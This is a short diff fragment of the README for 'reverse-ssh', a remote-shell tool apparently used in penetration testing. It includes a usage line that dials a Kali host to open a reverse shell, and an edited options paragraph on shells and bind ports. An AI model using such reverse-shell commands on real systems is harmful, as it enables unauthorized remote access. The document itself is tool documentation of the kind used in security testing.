Fahrj/reverse-ssh/Readme.md

         reverse-ssh -v -b 0 kali@192.168.0.2

 Options:
-        -s, Shell to use for incoming connections, e.g. /bin/bash; no effect for windows (default: /bin/bash) -l, Bind scenario only: listen at this address:port (default: :31337) -p, Reverse scenario only: ssh port at home (default: 22) -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
+        -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash) for windows this can only be used to give a path to 'ssh-shellhost.exe' to enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory) -l, Bind scenario only: listen at this address:port (default: :31337) -p, Reverse scenario only: ssh port at home (default: 22) -b, Reverse scenario only: bind to this port after dialling home (default: 8888)